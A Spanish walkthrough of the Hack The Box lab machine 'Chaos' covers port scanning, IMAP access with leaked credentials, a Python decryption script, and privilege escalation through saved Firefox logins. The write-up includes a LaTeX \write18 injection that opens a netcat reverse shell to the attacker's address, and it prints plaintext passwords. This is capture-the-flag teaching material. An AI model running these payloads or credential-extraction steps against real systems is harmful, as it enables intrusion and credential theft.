Cómo resolver ‘Chaos’
7 min readMay 25, 2019
Paso a paso de como resolver la máquina Chaos.
USER
Enumeración
Como siempre, lo primero que haremos es un escaneo de puertos con nmap:
nmap -v -sC -sV chaos.htbSalida:
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.34 (Ubuntu)
|_http-title: Site doesn’t have a title (text/html).
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL STLS UIDL TOP CAPA AUTH-RESP-CODE RESP-CODES
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018–10–28T10:01:49
| Not valid after: 2028–10–25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
143/tcp open imap Dovecot imapd (Ubuntu)
|_imap-capabilities: Pre-login ID more LOGIN-REFERRALS SASL-IR ENABLE STARTTLS post-login have listed LITERAL+ IMAP4rev1 capabilities OK LOGINDISABLEDA0001 IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018–10–28T10:01:49
| Not valid after: 2028–10–25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imap Dovecot imapd (Ubuntu)
|_imap-capabilities: Pre-login ID LOGIN-REFERRALS SASL-IR ENABLE OK post-login more have LITERAL+ IMAP4rev1 listed capabilities AUTH=PLAINA0001 IDLE
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018–10–28T10:01:49
| Not valid after: 2028–10–25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3 Dovecot pop3d
|_pop3-capabilities: PIPELINING SASL(PLAIN) USER UIDL TOP CAPA AUTH-RESP-CODE RESP-CODES
| ssl-cert: Subject: commonName=chaos
| Subject Alternative Name: DNS:chaos
| Issuer: commonName=chaos
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018–10–28T10:01:49
| Not valid after: 2028–10–25T10:01:49
| MD5: af90 2165 92c7 740f d97a 786a 7e9f cb92
|_SHA-1: 5a4d 4223 3b08 a24b 7d5a e509 09bf 9570 aa2c f6ba
|_ssl-date: TLS randomness does not represent time
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: EA9A0A98E2A16B0ADEA1F6ED448F4CEF
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn’t have a title (text/html; Charset=iso-8859–1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelDirb
http://chaos/index.html
http://chaos/wp
http://chaos/wp/wordpress
http://chaos/wp/wordpress/index.php
http://chaos/wp/wordpress/wp-includes
http://chaos/wp/wordpress/wp-content
http://chaos/wp/wordpress/wp-admin
http://chaos/index.html
http://chaos/wp
http://chaos/wp/wordpress
http://chaos/wp/wordpress/index.php
http://chaos/wp/wordpress/wp-content
http://chaos/wp/wordpress/wp-content/index.php
http://chaos/wp/wordpress/wp-content/plugins
http://chaos/wp/wordpress/wp-content/themes
http://chaos/wp/wordpress/wp-includes
http://chaos/wp/wordpress/wp-includes/certificates
http://chaos/wp/wordpress/wp-admin
http://chaos/wp/wordpress/wp-admin/admin.php
http://chaos/wp/wordpress/wp-admin/css
http://chaos/wp/wordpress/wp-admin/images
http://chaos/wp/wordpress/wp-admin/includes
http://chaos/wp/wordpress/wp-admin/index.php
http://chaos/wp/wordpress/wp-admin/js
http://chaos/wp/wordpress/wp-admin/maint
http://chaos/wp/wordpress/wp-admin/network
http://chaos/wp/wordpress/wp-admin/userCargamos http://10.10.10.120/wp/wordpress/
Para llegar a esta página protegida debemos usar la clave human. La cual dedujimos al revisar que el creador del post era HUMAN.
Luego de introducir la clave:
Para ingresar al email utilizamos openssl, usamos las credenciales encontradas en la página de Wordpress:
> openssl s_client -showcerts -connect 10.10.10.120:993 -crlfNos autentificamos de la siguiente forma:
A LOGIN ayush jiujitsu
Leemos el mensaje en el folder drafts.
TAG FETCH 1 (BODY[text])El mensaje es el siguiente:
ME-Version: 1.0
Content-Type: multipart/mixed;
boundary=”=_00b34a28b9033c43ed09c0950f4176e1"
Date: Sun, 28 Oct 2018 17:46:38 +0530
From: ayush <ayush@localhost>
To: undisclosed-recipients:;
Subject: service
Message-ID: <7203426a8678788517ce8d28103461bd@webmail.chaos.htb>
X-Sender: ayush@localhost
User-Agent: Roundcube Webmail/1.3.8— =_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset=US-ASCII;
format=flowedHii, sahay
Check the enmsg.txt
You are the password XD.
Also attached the script which i used to encrypt.
Thanks,
Ayush— =_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: application/octet-stream;
name=enim_msg.txt
Content-Disposition: attachment;
filename=enim_msg.txt;
size=272MDAwMDAwMDAwMDAwMDIzNK7uqnoZitizcEs4hVpDg8z18LmJXjnkr2tXhw/AldQmd/g53L6pgva9
RdPkJ3GSW57onvseOe5ai95/M4APq+3mLp4GQ5YTuRTaGsHtrMs7rNgzwfiVor7zNryPn1Jgbn8M
7Y2mM6I+lH0zQb6Xt/JkhOZGWQzH4llEbyHvvlIjfu+MW5XrOI6QAeXGYTTinYSutsOhPilLnk1e
6Hq7AUnTxcMsqqLdqEL5+/px3ZVZccuPUvuSmXHGE023358ud9XKokbNQG3LOQuRFkpE/LS10yge
+l6ON4g1fpYizywI3+h9l5Iwpj/UVb0BcVgojtlyz5gIv12tAHf7kpZ6R08=
— =_00b34a28b9033c43ed09c0950f4176e1
Content-Transfer-Encoding: base64
Content-Type: text/x-python; charset=us-ascii;
name=en.py
Content-Disposition: attachment;
filename=en.py;
size=804ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoK
— =_00b34a28b9033c43ed09c0950f4176e1 —
)
El código fuente (enim_msg.txt) de en.py está encodeado en base 64.
ZGVmIGVuY3J5cHQoa2V5LCBmaWxlbmFtZSk6CiAgICBjaHVua3NpemUgPSA2NCoxMDI0CiAgICBv
dXRwdXRGaWxlID0gImVuIiArIGZpbGVuYW1lCiAgICBmaWxlc2l6ZSA9IHN0cihvcy5wYXRoLmdl
dHNpemUoZmlsZW5hbWUpKS56ZmlsbCgxNikKICAgIElWID1SYW5kb20ubmV3KCkucmVhZCgxNikK
CiAgICBlbmNyeXB0b3IgPSBBRVMubmV3KGtleSwgQUVTLk1PREVfQ0JDLCBJVikKCiAgICB3aXRo
IG9wZW4oZmlsZW5hbWUsICdyYicpIGFzIGluZmlsZToKICAgICAgICB3aXRoIG9wZW4ob3V0cHV0
RmlsZSwgJ3diJykgYXMgb3V0ZmlsZToKICAgICAgICAgICAgb3V0ZmlsZS53cml0ZShmaWxlc2l6
ZS5lbmNvZGUoJ3V0Zi04JykpCiAgICAgICAgICAgIG91dGZpbGUud3JpdGUoSVYpCgogICAgICAg
ICAgICB3aGlsZSBUcnVlOgogICAgICAgICAgICAgICAgY2h1bmsgPSBpbmZpbGUucmVhZChjaHVu
a3NpemUpCgogICAgICAgICAgICAgICAgaWYgbGVuKGNodW5rKSA9PSAwOgogICAgICAgICAgICAg
ICAgICAgIGJyZWFrCiAgICAgICAgICAgICAgICBlbGlmIGxlbihjaHVuaykgJSAxNiAhPSAwOgog
ICAgICAgICAgICAgICAgICAgIGNodW5rICs9IGInICcgKiAoMTYgLSAobGVuKGNodW5rKSAlIDE2
KSkKCiAgICAgICAgICAgICAgICBvdXRmaWxlLndyaXRlKGVuY3J5cHRvci5lbmNyeXB0KGNodW5r
KSkKCmRlZiBnZXRLZXkocGFzc3dvcmQpOgogICAgICAgICAgICBoYXNoZXIgPSBTSEEyNTYubmV3
KHBhc3N3b3JkLmVuY29kZSgndXRmLTgnKSkKICAgICAgICAgICAgcmV0dXJuIGhhc2hlci5kaWdl
c3QoKQoKPara decode ejecutamos:
> cat file | base64 -dY obtenemos el siguiente código:
def encrypt(key, filename):
chunksize = 64*1024
outputFile = "en" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV =Random.new().read(16)encryptor = AES.new(key, AES.MODE_CBC, IV)with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)while True:
chunk = infile.read(chunksize)if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' '* (16 — (len(chunk) % 16))outfile.write(encryptor.encrypt(chunk))def getKey(password):
hasher = SHA256.new(password.encode('utf-8'))
return hasher.digest()
Debemos analizar el código fuente y generar una función que permita desencriptar usando Python:
#!/usr/bin/pythonimport sys
import os
import struct
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256#print 'Number of arguments:', len(sys.argv), 'arguments.'
#print 'Argument List:', str(sys.argv)def encrypt(key, filename):
chunksize = 64*1024
outputFile = "en" + filename
filesize = str(os.path.getsize(filename)).zfill(16)
IV =Random.new().read(16)encryptor = AES.new(key, AES.MODE_CBC, IV)with open(filename, 'rb') as infile:
with open(outputFile, 'wb') as outfile:
outfile.write(filesize.encode('utf-8'))
outfile.write(IV)while True:
chunk = infile.read(chunksize)if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' '* (16 — (len(chunk) % 16))outfile.write(encryptor.encrypt(chunk))def decrypt (key,in_filename, out_filename=None):
if not out_filename:
out_filename = os.path.splitext(in_filename)[0]
chunksize=24*1024
with open(in_filename, 'rb') as infile:
origsize = str(os.path.getsize(in_filename)).zfill(16)
iv = infile.read(16)
decryptor = AES.new(key, AES.MODE_CBC, iv)with open(out_filename, 'wb') as outfile:
while True:
chunk = infile.read(chunksize)
if len(chunk) == 0:
break
elif len(chunk) % 16 != 0:
chunk += b' '* (16 — (len(chunk) % 16))outfile.write(decryptor.decrypt(chunk))outfile.truncate(int(origsize))def getKey(password):
encoded=password.encode('utf-8')
print encoded
hasher = SHA256.new(encoded)
return hasher.digest()key=str(sys.argv[1])
filename=str(sys.argv[2])
fileout=str(sys.argv[3])key2=getKey(key)
print key2
decrypt(key2, filename, fileout)
Lo ejecutamos de la siguiente forma:
python decrypt.py sahay encripted_msg.txt output.txtLo que nos entrega:
š�TW�sLPOg���SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gKY luego, limpiamos los caracteres mal formados:
> echo "SGlpIFNhaGF5CgpQbGVhc2UgY2hlY2sgb3VyIG5ldyBzZXJ2aWNlIHdoaWNoIGNyZWF0ZSBwZGYKCnAucyAtIEFzIHlvdSB0b2xkIG1lIHRvIGVuY3J5cHQgaW1wb3J0YW50IG1zZywgaSBkaWQgOikKCmh0dHA6Ly9jaGFvcy5odGIvSjAwX3cxbGxfZjFOZF9uMDdIMW45X0gzcjMKClRoYW5rcywKQXl1c2gK"| base64 -dLo que retorna:
Hii SahayPlease check our new service which create pdfp.s — As you told me to encrypt important msg, i did :)http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3Thanks,
Ayush
Debemos modificar la configuración en /etc/hosts para agregar a chaos.htb, agregamos lo siguiente:
echo "10.10.10.120 chaos.htb" >> /etc/hostsDebemos entrar a la URL http://chaos.htb/J00_w1ll_f1Nd_n07H1n9_H3r3
Reverse shell
Primero debemos escuchar desde nuestra máquina:
>nc -lvp 6699Luego, para conseguir el shell reverso, debemos ingresar el siguiente código en el formulario.
immediate\write18{mknod /tmp/backpipe p ;/bin/sh 0</tmp/backpipe | nc 10.10.14.5 6699 1>/tmp/backpipe}
\newread\file
\openin\file=test.txt
\loop\unless\ifeof\file
\read\file to\fileline
\text{\fileline}
\repeat
\closein\fileEsto nos permitirá levantar un shell reverso. (Si no funciona, cambia el nombre del archivo en todas las instancias)
En seguida debemos seleccionar el Template test2 y hacer click en "Create PDF".
Mejorando el shell
python -c 'import pty; pty.spawn("/bin/bash")'Ingresando como usuario ayush:
> su — ayush Con la clave ‘jiujitsu’, encontramos la flag de user!
ROOT
Dentro de la cuenta del usuario ayush:
Seteamos el PATH
> PATH=$PATH:/bin:/usr/binDentro de la carpeta del usuario encontramos una pista, una carpeta de un perfil de Firefox.
En .mozilla/firefox/bzo7sjt1.default
Debemos copiar los archivos key4.db y logins.json a un perfil de firefox existente. Al abrir Firefox con los archivos copiados en la ruta del perfil (generalmente es algo como .mozilla/firefox/profiles) vamos a la configuración del navegador, navegamos a Preferences -> Privacy & Security -> Logins & Passwords
Luego hacemos click en “Saved Logins” y aparecerá la siguiente pantalla:
Ya vemos que el nombre de usuario es ‘root’. Hacemos click en “Show Passwords” y nos aparecerá un diálogo con el master password, que es ‘jiujitsu’.
La clave es Thiv8wrej~
Utilizamos esta clave para logearnos como root en el servidor.
> su - rootY obtenemos la flag:
4eca7e09e3520e0XXXX63cfbabbc70